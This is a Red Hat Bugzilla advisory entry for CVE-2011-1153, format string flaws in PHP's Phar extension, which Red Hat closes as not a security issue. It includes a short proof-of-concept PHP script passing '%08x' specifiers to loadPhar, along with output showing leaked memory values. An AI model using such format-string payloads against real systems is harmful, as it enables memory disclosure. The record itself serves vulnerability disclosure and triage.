Bug 688378 (CVE-2011-1153) - CVE-2011-1153 php: several format string vulnerabilities in PHP's Phar extension
Summary: CVE-2011-1153 php: several format string vulnerabilities in PHP's Phar extension
Status: CLOSED NOTABUG
Alias: CVE-2011-1153
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: public=20110314,reported=20110314,sou...
Keywords: Security
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2011-03-16 22:02 UTC by Vincent Danen
Modified: 2019-06-08 18:46 UTC (History)
6 users (show)

(edit)
Clone Of:
(edit)
Last Closed: 2011-04-29 22:28:46 UTC


Attachments (Terms of Use)

Description Vincent Danen 2011-03-16 22:02:23 UTC
Several format string flaws were found in PHP's Phar extension [1] that could be used to leak some parts of memory via error messages.  These have been corrected in upstream svn [2].  The Phar extension is part of PHP since 5.3.0.

This is demonstrated with the following:

<?php

$x = new PharData('a.php');
$x->loadPhar("%08x.%08x.%08x.%08x.%08x");

?>

% php phar.php 
PHP Fatal error:  Uncaught exception 'PharException' with message 'unable to open phar for reading "00000000.00000008.00000000.bffb3624.081ef712"' in /tmp/tests/phar.php:4
Stack trace:
#0 /tmp/tests/phar.php(4): PharData::loadPhar('%08x.%08x.%08x....')
#1 {main}
  thrown in /tmp/tests/phar.php on line 4

[1] http://bugs.php.net/bug.php?id=54247
[2] http://svn.php.net/viewvc?view=revision&revision=309221

Comment 1 Vincent Danen 2011-03-16 22:15:07 UTC
I'm not very familiar with these phar archives, but I suspect these would not be something a user could just upload (or a normal site would allow to be uploaded and then loaded), so I believe this flaw is probably more of a local flaw, than a remote flaw.

Comment 11 Vincent Danen 2011-04-29 22:28:46 UTC
Statement:

Red Hat does not consider this flaw to be a security issue.  It is improbable that a script would accept untrusted user input or unvalidated script input data as a PHAR archive file name to load.  The file name passed to the PHAR-handling functions is therefore under the full control of the script author and no trust boundary is crossed.


Note You need to log in before you can comment on or make changes to this bug.